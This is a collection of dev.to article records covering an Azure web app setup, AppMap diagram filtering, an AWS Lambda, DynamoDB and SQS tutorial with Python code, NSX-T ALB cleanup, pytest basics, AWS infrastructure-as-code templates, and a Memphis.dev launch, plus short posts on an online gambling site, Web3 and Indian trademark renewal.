This will take you to the **Create a web app** page with two options: **Build and host a web app with Azure Web Apps** or **Build and host a web app with Azure Web Apps with a database**.

We are selecting the first option for this exercise, since we just want to host a web app.
- Click the **Create** button.
This will open the page for us to enter the basic details of the web app such as **Resource group** and **Name** of the application.

- Scrolling further down the page, we will notice that all the other configuration settings have been provided by default. This makes it possible for us to create the application and start using it right away, saving us the time and effort we would have spent on configuration.

- Click on **Review + create** button to start creating the web app.
This reviews and displays the information of the web app to be created.
- Click on the **Create** button.

Deployment is complete

- Click on **Go to resource**
Overview page of our **Web app**, ready for use.

**The Web App**

**Conclusion**
I hope this blog was able to serve as a guide to the best way to begin your Azure journey. You can now try deploying other resources through the **Azure Quickstart Center**.
**Thanks for reading this article, please subscribe and follow my page**
| donhadley22 | |
1,520,123 | How to streamline and focus your sequence diagrams | AppMap’s new feature gives developers greater control over their sequence diagrams to enhance code... | 0 | 2023-06-28T19:38:01 | https://dev.to/appmap/how-to-streamline-and-focus-your-sequence-diagrams-3p7o | webdev, programming, news, vscode | **AppMap’s new feature gives developers greater control over their sequence diagrams to enhance code reviews.**
The value of sequence diagrams, especially for code reviews, [is growing](https://dev.to/appmap/quickly-learn-how-new-to-you-code-works-using-sequence-diagrams-h9g). And AppMap is at the cutting edge, creating new tools and capabilities for developers to generate and use sequence diagrams for designing and improving code quality from writing to reviewing. In this article, I’ll share a new filtering feature of our sequence diagram tool in AppMap.
### Taming the complexity of sequence diagrams
As software projects grow in size and complexity, so do the sequence diagrams generated from them that represent their inner workings. These diagrams often become extensive and overwhelming, making it challenging to decipher the flow of interactions and identify critical components. The AppMap user community has requested a way to declutter their [automatically-generated sequence diagrams](https://dev.to/appmap/automatically-generate-interactive-sequence-diagrams-of-your-java-codes-runtime-behavior-2jg0) in order to focus on the essential elements of their application.
We heard you, and we’re excited to share this new feature release. Read on for the details, and watch this walkthrough video to see it in action.
{% youtube 5uHA_pnKzIc %}
### Advanced filtering for unparalleled control
With our latest release, we added an enhanced filtering system that empowers developers to take control of their sequence diagrams by eliminating unnecessary noise and tailoring your diagrams to display only the information that matters most to you and your team.
**3 key functionalities**
1. Live filtering: Instantly reduce complexity by hiding specific components, such as external code or framework-related elements. With just a few clicks, you can create a clean, focused view of your sequence diagram.
2. Customizable views: Once you have refined your diagram to your liking, you can save that view as a filter. This means you can apply the filter to future app maps, whether you want it as a default setting for all diagrams or selectively choose where to apply it.
3. Seamless switching: Switching between different views is effortless. Just select the desired filter, and the diagram will dynamically update to display your preferred elements. No need to rebuild or navigate complex menus.

**Benefits and advantages**
AppMap's enhanced filtering feature goes beyond simplifying your sequence diagrams.
1. Persistence: Your custom filter views persist as long as the diagram remains open. This allows you to revisit and analyze your diagrams without losing your customized settings. If a diagram has been closed, getting that view back is as simple as reapplying the filter. If you find yourself applying the same filter to a majority of your sequence diagrams, set a previously saved filter as the default, providing a seamless experience across any sequence diagram you choose to open or share. Changing or setting a default view becomes as simple as clicking a button.
2. Intuitive interface: Our user-friendly interface ensures that applying filters and customizing your view is a breeze. With our configure-as-you-go model, developers spend less time configuring and more time gaining insights from their diagrams.
3. Increased efficiency: By decluttering your sequence diagrams and focusing on the relevant elements, you can make quick decisions on things that matter most, improving your code analysis efficiency and gaining a deeper understanding of your application's behavior on whatever scale you choose to view.
### Getting Started + community
Sequence diagrams are particularly useful for designing and testing software systems that involve multiple components, asynchronous events, or complex control flows. Learn more about the common use cases for sequence diagrams and how to interpret them [in this post](https://dev.to/appmap/quickly-learn-how-new-to-you-code-works-using-sequence-diagrams-h9g).
To try out our new filtering feature, [download AppMap](https://appmap.io/download) into your favorite IDE and use our [handy docs](https://appmap.io/docs/appmap-overview.html) to get started. We hope you enjoy exploring the possibilities, experimenting with different views, and revolutionizing how you analyze and understand your code!
To chat with us and other users about it and get your questions answered, [join our community](https://appmap.io/community).
Cover Photo by [Luca Bravo](https://unsplash.com/@lucabravo?utm_source=unsplash&utm_medium=referral&utm_content=creditCopyText) on [Unsplash](https://unsplash.com/s/photos/sequence-diagram-coding?utm_source=unsplash&utm_medium=referral&utm_content=creditCopyText)
{% user ghamelin%}
| ghamelin |
1,520,766 | Building a Serverless Program with AWS Lambda, DynamoDB, and SQS | Introduction: Serverless computing has revolutionized the way we develop and deploy... | 0 | 2023-06-29T17:48:06 | https://dev.to/vedvaghela/building-a-serverless-program-with-aws-lambda-dynamodb-and-sqs-2p8c | aws, serverless, dynamodb, lambda | ## **Introduction:**
Serverless computing has revolutionized the way we develop and deploy applications, offering scalability, cost-efficiency, and simplified management. In this blog, we'll explore how to build a serverless program using AWS Lambda, DynamoDB, and SQS (Simple Queue Service). By leveraging these powerful services, we'll create three Lambda functions to automate the process of managing active and inactive accounts.
## **Why Serverless?**
By adopting a serverless architecture, we can enjoy several advantages. Firstly, we don't need to manage any server infrastructure as AWS Lambda automatically handles the scaling, capacity provisioning, and fault tolerance. Secondly, we only pay for the compute resources used during the execution of the Lambda functions, allowing for cost optimization. Lastly, the decoupled nature of serverless components provides flexibility and enables independent development and scaling.
## **The Problem:**
For example, say we have data for 10 accounts in DynamoDB => 4 are active and 6 are inactive. We need the IDs of the inactive accounts to make them active and allocate them to their further use cases. When multiple users trigger Lambdas that fetch data directly from DynamoDB to get their temporary account IDs, two Lambdas may receive the same ID from DynamoDB, since both of those items fall under the same category of being inactive.

## **Solution:**
This is solved by a simple method, i.e. by using the Amazon SQS service.
Amazon SQS is a reliable, highly-scalable hosted queue for storing messages as they travel between applications or microservices. Amazon SQS moves data between distributed application components and helps you decouple these components.

## **Setup:**
**DynamoDB:**
For simplicity in this example, we are designing a simple DynamoDB table with only two attributes:
1. AccountID (String) => Partition Key
2. Status (String)
Example Table:

**SQS:**
Go to the SQS service and click on the create queue option.
Select Standard Queue as the type of queue, keep everything else as default and proceed to creating the queue.

After creation of the queue, go into "myTestQueue".

In the details block, take note of the **SQS URL**, which will be used later in our serverless functions.
We can later check the contents of our queue by clicking on the "send and receive messages" button.
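Alternatively, instead of copying the URL from the console, you can resolve it by queue name with boto3:

```python
import boto3

sqs = boto3.client('sqs')

# Look up the queue URL by name instead of pasting it from the console
queue_url = sqs.get_queue_url(QueueName='myTestQueue')['QueueUrl']
print(queue_url)
```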
**We will be creating 3 lambda functions:**
1) dumpIntoSQS
2) receiveID
3) pushIntoSQS_uponChange
We will be using the AWS SDK for Python: [Boto3](https://boto3.amazonaws.com/v1/documentation/api/latest/index.html)
**1) dumpIntoSQS**
This function will dump the IDs of all the inactive accounts present in our DynamoDB table into the queue. This sets the automation in motion.
```python
import json
import os

import boto3

db_client = boto3.client('dynamodb')
sqs = boto3.client('sqs')

queue_url = os.environ['SQS_URL']
dynamodb_name = os.environ['DYNAMO_DB_NAME']


def lambda_handler(event, context):
    # Get the inactive account IDs from DynamoDB.
    # "Status" is a reserved word, so it is aliased via ExpressionAttributeNames.
    # (Note: a production version should paginate using LastEvaluatedKey.)
    response = db_client.scan(
        TableName=dynamodb_name,
        FilterExpression='#st = :s_val',
        ExpressionAttributeNames={'#st': 'Status'},
        ExpressionAttributeValues={':s_val': {'S': 'Inactive'}},
    )
    items = response['Items']

    for acc in items:
        # Send each inactive account ID to the queue
        response_q = sqs.send_message(
            QueueUrl=queue_url,
            DelaySeconds=10,
            MessageAttributes={
                'AccountID': {
                    'DataType': 'String',
                    'StringValue': acc['AccountID']['S'],
                }
            },
            MessageBody='Inactive account id info',
        )
        print(response_q['MessageId'])

    return {
        'statusCode': 200,
        'body': json.dumps('All inactive account IDs added to the SQS queue'),
    }
```
1. Use environment variables for the SQS URL and DynamoDB table name. These can be set up under Lambda function -> Configuration -> Environment variables (use environment variables in all the Lambda functions for sensitive information like URLs, ARN values, etc.).
2. "Status" is a reserved keyword in DynamoDB, so we alias it as #st via ExpressionAttributeNames and use :s_val as a placeholder for its value via ExpressionAttributeValues.
3. For the Lambda to execute we need to give appropriate permissions to our lambda role. Go to Functions > dumpIntoSQS > Configuration > Permissions > Execution Role which will redirect you to IAM policies of our lambda role.
- Click on Add Permissions > Attach Policy. Attach the following policies to our role.
- _AmazonDynamoDBFullAccess_
- _AmazonSQSFullAccess_
**2) receiveID**
This function performs three tasks:
- Receive the ID of an inactive account from the queue.
- Change the account's status from Inactive to Active in the table once it has been assigned from the queue.
- Delete the assigned ID from the queue.
```python
import os

import boto3

sqs = boto3.client('sqs')
dynamodb = boto3.resource('dynamodb')

queue_url = os.environ['SQS_URL']
dynamoDB_name = os.environ['DYNAMO_DB_NAME']


def lambda_handler(event, context):
    # Receive one message from the SQS queue. A non-zero VisibilityTimeout
    # hides the message from other consumers while it is being processed,
    # so two Lambdas cannot be handed the same account ID.
    response_sqs = sqs.receive_message(
        QueueUrl=queue_url,
        AttributeNames=['SentTimestamp'],
        MaxNumberOfMessages=1,
        MessageAttributeNames=['All'],
        VisibilityTimeout=30,
        WaitTimeSeconds=0,
    )

    # Guard against an empty queue (no 'Messages' key in the response)
    if 'Messages' not in response_sqs:
        return {'statusCode': 404, 'body': 'No inactive accounts available'}

    message = response_sqs['Messages'][0]
    receipt_handle = message['ReceiptHandle']
    accountIdForUpdate = message['MessageAttributes']['AccountID']['StringValue']

    # Update DynamoDB before deleting the message from the queue
    table = dynamodb.Table(dynamoDB_name)
    response_db = table.update_item(
        Key={'AccountID': accountIdForUpdate},
        ExpressionAttributeNames={'#st': 'Status'},
        UpdateExpression='SET #st = :s_val',
        ExpressionAttributeValues={':s_val': 'Active'},
    )

    # Delete the assigned ID from the queue
    sqs.delete_message(QueueUrl=queue_url, ReceiptHandle=receipt_handle)

    print('Received message & deleted: %s \n' % message)
    print('Item updated: ', response_db)

    return {
        'statusCode': 200,
        'body': accountIdForUpdate,
    }
```
For the Lambda to execute we need to give appropriate permissions to our Lambda role. Go to Functions > receiveID > Configuration > Permissions > Execution Role, which will redirect you to the IAM policies of our Lambda role.
- Click on Add Permissions > Attach Policy. Attach the following policies to our role.
- _AmazonDynamoDBFullAccess_
- _AmazonSQSFullAccess_
**3) pushIntoSQS_uponChange**
This Lambda will send a message to SQS (i.e. push into the queue) containing the ID of an account that has been changed from Active to Inactive after its usage is complete.
```python
import json
import os

import boto3

sqs = boto3.client('sqs')
queue_url = os.environ['SQS_URL']


def lambda_handler(event, context):
    # The DynamoDB stream record carries the item's new state in NewImage
    new_image = event['Records'][0]['dynamodb']['NewImage']
    accountID = new_image['AccountID']['S']

    if new_image['Status']['S'] == 'Inactive':
        # Push the freed-up account ID back onto the queue
        response = sqs.send_message(
            QueueUrl=queue_url,
            DelaySeconds=10,
            MessageAttributes={
                'AccountID': {
                    'DataType': 'String',
                    'StringValue': accountID,
                }
            },
            MessageBody='Inactive account id info',
        )
        print('Status changed to ', new_image['Status']['S'])

    return {
        'statusCode': 200,
        'body': json.dumps('Status is changed in DynamoDB'),
    }
```
For the Lambda to execute we need to give appropriate permissions to our Lambda role. Go to Functions > pushIntoSQS_uponChange > Configuration > Permissions > Execution Role, which will redirect you to the IAM policies of our Lambda role.
- Click on Add Permissions > Attach Policy. Attach the following policies to our role.
- _AWSLambdaSQSQueueExecutionRole_
- _AmazonSQSFullAccess_
To trigger the Lambda, we need to set up a DynamoDB Stream.
To set up the DynamoDB Stream, go to the table -> Exports and streams.


Once the DynamoDB Stream is turned on, we need to add a trigger so that the stream can trigger the execution of a Lambda function.


Now we have created the DB Stream and have set it as the trigger for our lambda.
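For reference, the stream event the function receives looks roughly like the following (abridged; the values are illustrative):

```json
{
  "Records": [
    {
      "eventName": "MODIFY",
      "dynamodb": {
        "NewImage": {
          "AccountID": { "S": "acc-007" },
          "Status": { "S": "Inactive" }
        }
      }
    }
  ]
}
```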
After setting up the Lambda, test it by changing one of the Active accounts to Inactive, or by creating a new account ID with Inactive status. Then check your SQS queue for messages and you will see a received message that looks like the following:

## **Conclusion:**
In this blog, we explored how to build a serverless program using AWS Lambda, DynamoDB, and SQS. By implementing three Lambda functions, we automated the process of managing active and inactive accounts. We utilized DynamoDB Streams to trigger a Lambda function whenever an account's status changed and added the account ID to an SQS queue. Finally, we created a Lambda function to consume the account IDs from the queue and perform the necessary actions.
**Documentation and references:**
[Dynamo DB](https://boto3.amazonaws.com/v1/documentation/api/latest/reference/services/dynamodb.html)
[SQS](https://boto3.amazonaws.com/v1/documentation/api/latest/reference/services/sqs.html)
[Code(github)](https://github.com/VedVaghela/serverlessCode)
_Note:_
The policies attached to the Lambda roles grant full access for the purpose of smooth operation in this example. However, one should follow the principle of least privilege and attach only the necessary policies to the role.
This blog is for knowledge purposes only. Use the resources wisely and responsibly.
| vedvaghela |
1,521,168 | NSX-T 3.2 and NSX ALB (Avi) Deployment Error - "Controller is not reachable. {0}" | Note: This feature has been deprecated by VMware NSX-T 3.2 has been released, and has a ton of... | 0 | 2023-07-04T15:30:45 | https://blog.engyak.co/2021/12/nsx-t-32-and-nsx-alb-avi-deployment/ | ---
title: NSX-T 3.2 and NSX ALB (Avi) Deployment Error - "Controller is not reachable. {0}"
published: true
date: 2021-12-23 06:00:00 UTC
tags:
canonical_url: https://blog.engyak.co/2021/12/nsx-t-32-and-nsx-alb-avi-deployment/
---
**Note: This feature has been [deprecated by VMware](https://kb.vmware.com/s/article/87899)**
NSX-T 3.2 has been released, and has a ton of spiffy features. The NSX ALB integration is particularly neat, but while repeatedly (repeatably) breaking the integration to learn more about it, I ran into this error:
[

](error.png)
When deploying NSX ALB appliances from the NSX Manager, it's very important to keep the NSX ALB Controller appliances **where NSX Manager can see them**. In addition, the appliances **must exist on the same Layer 2 Segment**.
Detailed requirements for running the two together are here: [https://docs.vmware.com/en/VMware-NSX-T-Data-Center/3.2/installation/GUID-3D1F107D-15C0-423B-8E79-68498B757779.html](https://docs.vmware.com/en/VMware-NSX-T-Data-Center/3.2/installation/GUID-3D1F107D-15C0-423B-8E79-68498B757779.html)
This post is not about the integration, however.
The following error:
```
NSX Advanced Load Balancer Controller is not reachable {0}
```
Indicates that NSX-T has orphaned appliances. NSX-T has API invocations for cleaning this up, but no GUI integration. This is similar to other objects, and is because programmatic checking should be used to make this work reliable.
To fix this, we must perform the following steps:
- Get the list of NSX ALB appliances, if there isn't any, exit
- Iterate through the list of appliances, prompting the user to delete
- After deleting, check to make sure that it was deleted
The first step for any API invocations should be [consulting the documentation](https://developer.vmware.com/apis/1198/nsx-t). The NSX ALB Appliance management section is **3.7.1.4.** After researching the procedure, I found the following endpoints:
- [/policy/api/v1/alb/controller-nodes/deployments](https://vdc-download.vmware.com/vmwb-repository/dcr-public/ce4128ae-8334-4f91-871b-ecce254cf69e/488f1280-204c-441d-8520-8279ac33d54b/api_includes/method_ListALBControllerNodeVMDeploymentRequests.html)
- [/policy/api/v1/alb/controller-nodes/deployments/<node-id>?action=delete](https://vdc-download.vmware.com/vmwb-repository/dcr-public/ce4128ae-8334-4f91-871b-ecce254cf69e/488f1280-204c-441d-8520-8279ac33d54b/api_includes/method_DeleteAutoDeployedALBControllerNodeVM.html)
Performing this procedure with programmatic interfaces is a good example of when to use APIs - the task is well defined, the results are easy to test, and work to prevent user mistakes is rewarding.
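If you want to roll your own, a standalone sketch of those three steps using plain `requests` might look like this (the manager address and credentials are placeholders, and it assumes the standard NSX-T list envelope with a `results` array - the linked repository below is the real, tested implementation):

```python
import requests

NSX = "https://nsx-manager.lab.local"  # manager address is a placeholder
AUTH = ("admin", "password")           # use real credentials / a token in practice
BASE = f"{NSX}/policy/api/v1/alb/controller-nodes/deployments"

# 1. Get the list of NSX ALB appliance deployments; exit if there aren't any
deployments = requests.get(BASE, auth=AUTH, verify=False).json().get("results", [])
if not deployments:
    raise SystemExit("No NSX ALB deployments found - nothing to clean up")

# 2. Iterate through the appliances, prompting the user before each delete
for node in deployments:
    node_id = node["id"]
    if input(f"Delete deployment {node_id}? [y/N] ").lower() == "y":
        requests.post(f"{BASE}/{node_id}?action=delete", auth=AUTH, verify=False)

# 3. Check that the deletions actually happened
remaining = requests.get(BASE, auth=AUTH, verify=False).json().get("results", [])
print(f"{len(remaining)} deployment(s) remaining")
```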
TL;DR - I wrote the code here, integrating it with the REST client: [https://github.com/ngschmidt/python-restify/blob/main/nsx-t/nsxalb\_deployment\_cleanup.py](https://github.com/ngschmidt/python-restify/blob/main/nsx-t/nsxalb_deployment_cleanup.py) | ngschmidt | |
1,521,497 | Mastering Pytest: An Introduction to Python Testing | Introduction Welcome to the first installment of our blog series on pytest—an incredible testing... | 23,569 | 2023-06-30T02:44:41 | https://dev.to/bshadmehr/mastering-pytest-an-introduction-to-python-testing-2gpd | Introduction
Welcome to the first installment of our blog series on pytest—an incredible testing framework for Python developers. Testing is a crucial aspect of software development, and pytest offers a simple yet powerful approach to writing and executing tests. In this blog post, we'll lay the foundation for mastering pytest by covering the basics and exploring its key features. So, let's dive in and unlock the potential of pytest for effective and efficient testing in Python.
**Table of Contents**
1. Understanding Testing and Pytest
2. Installing Pytest
3. Writing Your First Pytest Test Case
4. Organizing Test Files and Test Discovery
5. Exploring Pytest's Powerful Features
## 1. Understanding Testing and Pytest
Before we jump into pytest, let's start by understanding the importance of testing in software development and how pytest fits into the testing landscape.
### Why Testing Matters
Testing is an integral part of the software development process. It helps us ensure that our code works as expected, identifies and prevents bugs, and provides confidence in the reliability and correctness of our software. By writing tests, we can verify that our code meets the desired functionality, validates edge cases, and detects potential issues early on. Testing also plays a crucial role in maintaining and evolving codebases, allowing developers to refactor with confidence and avoid introducing regressions.
### What is Pytest?
Pytest is a testing framework for Python that simplifies the process of writing tests. It provides a clean and expressive syntax, powerful features, and a wealth of plugins that enhance its capabilities. Pytest is widely adopted in the Python community due to its simplicity and effectiveness, making it an excellent choice for both small and large projects.
Pytest offers numerous advantages over other testing frameworks. It embraces simplicity, allowing you to write concise and readable tests using plain Python asserts. It also provides powerful features such as fixtures, which enable you to create reusable test setup and teardown code. Pytest's rich plugin ecosystem offers a wide range of additional functionalities, such as code coverage, test parallelization, and test parameterization.
### Getting Started with Pytest
To start using pytest, you need to install it in your Python environment. Open your terminal or command prompt and run the following command:
```
pip install pytest
```
Once pytest is installed, you're ready to write your first test case and experience the power of pytest in action.
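As a tiny preview of what the next post covers, a first test file can be as small as this - pytest automatically discovers `test_*.py` files and `test_*` functions, and plain `assert` statements are all you need:

```python
# test_sample.py
def add(a: int, b: int) -> int:
    return a + b


def test_add():
    assert add(2, 3) == 5
```

Running `pytest` in the same directory will pick it up and report the result.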
## Conclusion
In this first blog post of our pytest series, we've introduced the importance of testing in software development and explored the fundamentals of pytest. We've learned that testing helps ensure the correctness and reliability of our code, and pytest simplifies the process of writing tests with its clean syntax and powerful features.
In the next blog post, we'll dive deeper into pytest by covering the installation process, writing your first pytest test case, and understanding how to organize your test files and discover tests automatically. Stay tuned as we unlock more of pytest's capabilities and empower you to become a testing maestro with pytest!
Happy testing! | bshadmehr | |
1,522,361 | Infrastructure as Code: Managing Docker Containers using AWS DevOps Tools | Introduction: In the world of modern software development, managing infrastructure has... | 0 | 2023-06-30T18:17:56 | https://dev.to/ukemzyskywalker/infrastructure-as-code-managing-docker-containers-using-aws-devops-tools-1oc4 | devops, docker, aws, containers | ### Introduction:
In the world of modern software development, managing infrastructure has become a critical aspect of the DevOps lifecycle. Infrastructure as Code (IaC) has emerged as a best practice that allows developers to define and manage their infrastructure using code.
This blog post will explore how AWS DevOps tools can be leveraged to manage Docker containers using Infrastructure as Code principles. We'll dive into the key concepts and demonstrate practical examples using code snippets.
### Understanding Infrastructure as Code:
Infrastructure as Code involves treating infrastructure components, such as servers, networks, and services, as programmable resources. This approach allows for version control, reproducibility, and automation, which are crucial for efficient infrastructure management. By using IaC, developers can define and provision their infrastructure using declarative code, enabling consistent deployments and eliminating manual configuration drift.
### Managing Docker Containers with AWS DevOps Tools:
AWS provides a set of powerful DevOps tools that seamlessly integrate with Docker containers, enabling effective management and deployment. Let's explore some key AWS services and how they can be utilized for managing Docker containers as code.
### 1. AWS CloudFormation:
AWS CloudFormation is a powerful service that allows you to define and provision your AWS infrastructure using declarative templates. With CloudFormation, you can define a stack that includes various AWS resources, such as EC2 instances, VPCs, and security groups.
To manage Docker containers, you can use CloudFormation to create and configure the necessary resources, such as Amazon Elastic Container Service (ECS) clusters, task definitions, and services.
Example CloudFormation template snippet for defining an ECS service:
```yaml
Resources:
  MyEcsService:
    Type: AWS::ECS::Service
    Properties:
      Cluster: !Ref MyEcsCluster
      TaskDefinition: !Ref MyEcsTaskDefinition
      DesiredCount: 2
      LaunchType: FARGATE
      NetworkConfiguration:
        AwsvpcConfiguration:
          Subnets:
            - !Ref MySubnet1
            - !Ref MySubnet2
          SecurityGroups:
            - !Ref MySecurityGroup
```
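For completeness, the task definition referenced above could be sketched like this (the image URI and sizing are illustrative, and a real Fargate task additionally needs an execution role to pull from ECR):

```yaml
Resources:
  MyEcsTaskDefinition:
    Type: AWS::ECS::TaskDefinition
    Properties:
      Family: my-app
      RequiresCompatibilities: [FARGATE]
      NetworkMode: awsvpc
      Cpu: "256"
      Memory: "512"
      ContainerDefinitions:
        - Name: my-app
          Image: 123456789012.dkr.ecr.us-east-1.amazonaws.com/my-app:latest
          PortMappings:
            - ContainerPort: 80
```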
### 2. AWS CodePipeline:
AWS CodePipeline is a fully managed continuous integration and continuous delivery (CI/CD) service. It enables you to automate your software release workflows, including the deployment of Docker containers. CodePipeline integrates with various AWS services, including AWS CodeCommit, AWS CodeBuild, and AWS CodeDeploy. You can configure a pipeline that automatically builds and deploys your Docker images to Amazon Elastic Container Registry (ECR) or ECS.
Example CodePipeline configuration for building and deploying Docker containers:
```yaml
Stages:
  - Name: Source
    Actions:
      - Name: SourceAction
        ActionTypeId:
          Category: Source
          Owner: AWS
          Provider: CodeCommit
          Version: "1"
        Configuration:
          RepositoryName: MyCodeRepo
          BranchName: main
        OutputArtifacts:
          - Name: source
  - Name: Build
    Actions:
      - Name: BuildAction
        ActionTypeId:
          Category: Build
          Owner: AWS
          Provider: CodeBuild
          Version: "1"
        Configuration:
          ProjectName: MyCodeBuildProject
        InputArtifacts:
          - Name: source
        OutputArtifacts:
          - Name: build
  - Name: Deploy
    Actions:
      - Name: DeployAction
        ActionTypeId:
          Category: Deploy
          Owner: AWS
          Provider: ECS
          Version: "1"
        Configuration:
          ClusterName: MyEcsCluster
          ServiceName: MyEcsService
          FileName: imagedefinitions.json
          Image1ArtifactName: build
```
### 3. AWS Elastic Beanstalk:
AWS Elastic Beanstalk is a fully managed platform that simplifies deploying and scaling applications. With Elastic Beanstalk, you can easily deploy your Docker containers without worrying about the underlying infrastructure. Elastic Beanstalk abstracts away the complexities of infrastructure management and provides a simple deployment model.
Example Elastic Beanstalk configuration for Docker container deployment:
```yaml
Resources:
  MyElasticBeanstalkEnvironment:
    Type: AWS::ElasticBeanstalk::Environment
    Properties:
      ApplicationName: MyApplication
      EnvironmentName: MyEnvironment
      SolutionStackName: "64bit Amazon Linux 2 v3.4.3 running Docker"
      OptionSettings:
        - Namespace: aws:elasticbeanstalk:environment
          OptionName: EnvironmentType
          Value: SingleInstance
        - Namespace: aws:elasticbeanstalk:application:environment
          OptionName: MyEnvironmentVariable
          Value: MyValue
```
By leveraging AWS DevOps tools such as CloudFormation, CodePipeline, and Elastic Beanstalk, you can effectively manage Docker containers using Infrastructure as Code principles.
This approach provides numerous benefits, including version control, repeatability, and automation. By treating infrastructure as code, you can achieve consistency, scalability, and efficiency in managing your Dockerized applications on the AWS platform. | ukemzyskywalker |
1,522,374 | Answer: Text search across multiple MS Word documents | answer re: Text search across multiple MS... | 0 | 2023-06-30T18:28:59 | https://dev.to/oscarsun72/answer-text-search-across-multiple-ms-word-documents-3m7l | {% stackoverflow 76591343 %} | oscarsun72 | |
1,522,801 | Play Tài Xỉu online at Sunwin – Card games, entertainment, and money-making galore | https://sunwinnews.com/ is a website providing online casino services✔️ including Tài... | 0 | 2023-07-01T07:27:19 | https://dev.to/sunwinnewscom/choi-tai-xiu-truc-tuyen-tai-sunwin-danh-bai-giai-tri-kiem-tien-tha-ga-528i |  | https://sunwinnews.com/ is a website providing online casino services✔️ including the Tài Xỉu (over/under) game✔️ With Sunwin✔️ you will experience top-tier games together with the most advanced technology features✔️✔️✔️
https://peatix.com/user/18007672
https://matters.town/@sunwinnewscom
https://sunwinnewscom.amebaownd.com/
https://github.com/sunwinnewscom
https://app.bountysource.com/people/118493-sunwinnews-com | sunwinnewscom | |
1,523,020 | Exploring Web3 and the Sephron Blockchain: Building a Decentralized Future | Introduction: Web3 and blockchain technology have emerged as revolutionary forces that are... | 0 | 2023-07-01T12:33:24 | https://dev.to/deven16082003/exploring-web3-and-the-sephron-blockchain-building-a-decentralized-future-3fa0 | Introduction:
Web3 and blockchain technology have emerged as revolutionary forces that are transforming various industries and redefining how we interact, transact, and collaborate online. One intriguing project in the realm of Web3 is Sephron, a blockchain platform that aims to create a decentralized ecosystem. In this blog, we will delve into the concept of Web3 and explore the features and potential of the Sephron blockchain.
Understanding Web3:
Web3 refers to the next generation of the internet, enabling decentralized and peer-to-peer interactions without relying on centralized intermediaries. It envisions a more open, transparent, and user-centric online environment, empowering individuals to have control over their data, digital assets, and online identities.
Sephron Blockchain:
The Sephron blockchain is a prominent player in the Web3 landscape. It is designed to provide a secure, scalable, and decentralized infrastructure for building decentralized applications (DApps) and facilitating smart contract functionality. Here are some key aspects of the Sephron blockchain:
Decentralization: The Sephron blockchain operates on a distributed network of nodes, ensuring that no central authority has control over the system. This decentralized architecture enhances transparency, security, and resilience.
Consensus Mechanism: Sephron employs a consensus mechanism called Proof-of-Stake (PoS), where validators are chosen based on their stake in the network. PoS ensures energy efficiency and enables faster transaction processing compared to traditional Proof-of-Work (PoW) systems.
Smart Contracts: Sephron supports the execution of smart contracts, which are self-executing agreements with predefined rules. These contracts automatically execute transactions when specific conditions are met, enabling trustless and tamper-proof interactions.
Interoperability: The Sephron blockchain aims to foster interoperability by integrating with other blockchains and protocols. This cross-chain compatibility allows for seamless communication and collaboration between different blockchain networks.
Privacy and Security: Sephron emphasizes privacy and security by utilizing cryptographic techniques to protect user data and transactions. It enables users to retain control over their private keys and ensures that sensitive information remains secure.
Potential Applications:
The Sephron blockchain has the potential to revolutionize various industries and use cases. Here are a few examples:
Finance and DeFi: Sephron can facilitate decentralized finance (DeFi) applications such as lending, borrowing, and decentralized exchanges, offering transparent and secure financial services without intermediaries.
Supply Chain Management: Sephron's decentralized nature can enhance supply chain transparency, tracking the movement of goods and verifying authenticity, ultimately reducing fraud and increasing trust.
Identity Management: Sephron's blockchain can enable self-sovereign identity solutions, where individuals have control over their personal information and can selectively share it with trusted entities.
Gaming and NFTs: Sephron's blockchain can power decentralized gaming platforms and the creation, trading, and ownership of non-fungible tokens (NFTs), providing unique digital assets and in-game economies.
Conclusion:
Web3 and blockchain technology, with projects like Sephron, hold immense potential to reshape the digital landscape by fostering decentralization, trust, and innovation. The Sephron blockchain's focus on security, scalability, and interoperability makes it an exciting platform for building decentralized applications across various sectors. As Web3 continues to evolve, we can expect groundbreaking advancements and transformative applications that empower individuals and revolutionize industries.
Disclaimer: The information provided in this blog is for educational purposes only and should not be considered as financial or investment advice. It is essential to conduct thorough research and seek professional guidance before making any investment decisions. | deven16082003 | |
1,524,579 | Process of Trademark Renewal in India | Step 1: Application Filing Submit a renewal application in Form TM-R to the Trademark... | 0 | 2023-07-03T10:19:14 | https://dev.to/gaurikaverma89/process-of-trademark-renewal-in-india-1lm3 | trademarkrenewalprocess, trademarkrenewal, trademarkregistration, trademarkregistrationinindia | Step 1: Application Filing
- Submit a renewal application in Form TM-R to the Trademark Registry.
- Include details such as the trademark registration number, current status, and applicant's contact information.
Step 2: Verification and Examination
- The Registry verifies the application and examines the trademark for conflicts and compliance with renewal requirements.
- If objections arise, the Registry seeks clarifications from the applicant, who must respond within the given timeframe.
Step 3: Publication in Trademark Journal
- After resolving any objections, the details of the trademark renewal are published in the Trademark Journal for a 4-month period.
- This allows for third-party opposition, which must be addressed by the applicant within the specified timeframe.
Step 4: Issuance of Renewal Certificate
- Upon successful completion of the publication period and resolution of any opposition, the Registry issues the [Trademark Renewal](https://www.setindiabiz.com/learning/process-of-trademark-renewal-in-india) Certificate.
- This certificate confirms the renewed validity of your trademark for the next 10 years.
**By following these steps and providing the necessary documents, you can ensure the smooth and effective renewal of your trademark in India.**
For more details : https://www.setindiabiz.com/trademark-registration | gaurikaverma89 |
1,524,752 | Introducing Memphis.dev Cloud: Empowering Developers with the Next Generation of Streaming | Event processing innovator Memphis.dev today introduced Memphis Cloud to enable a full serverless... | 0 | 2023-07-03T13:30:37 | https://memphis.dev/blog/introducing-memphis-dev-cloud-empowering-developers-with-the-next-generation-of-streaming/ |
Event processing innovator Memphis.dev today introduced Memphis Cloud to enable a full serverless experience for massive scale event streaming and processing, and announced it had secured $5.58 million in seed funding co-led by Angular Ventures and boldstart ventures, with participation from JFrog co-founder and CTO Fred Simon, Snyk co-founder Guy Podjarny, CircleCI CEO Jim Rose, Console.dev co-founder David Mytton, and Priceline CTO Martin Brodbeck.
## Introducing Memphis.dev Cloud
Memphis.dev, the next-generation event streaming platform, is ready to make waves in the world and disrupt data streaming with its highly anticipated cloud service launch.
With a firm commitment to providing developers and data engineers with a powerful and unified streaming engine, Memphis.dev aims to revolutionize the way software is utilizing a message broker. In this blog post, we delve into the key features and benefits of Memphis.dev’s cloud service, highlighting how it empowers organizations and developers to unleash the full potential of their data.
---
## What to expect?
**1. The Serverless Experience**
Memphis’ platform was intentionally designed to be deployed in minutes, on any Kubernetes, on any cloud, both on-prem, public cloud, or even in air-gapped environments.
To support the rise of multi-cloud architectures, Memphis streamlines development from the local dev station all the way to production, both on-prem and across various clouds, reducing TCO and overall complexity – and the serverless cloud enables even faster onboarding and time-to-value.
**2. Enable “Day 2” operations**
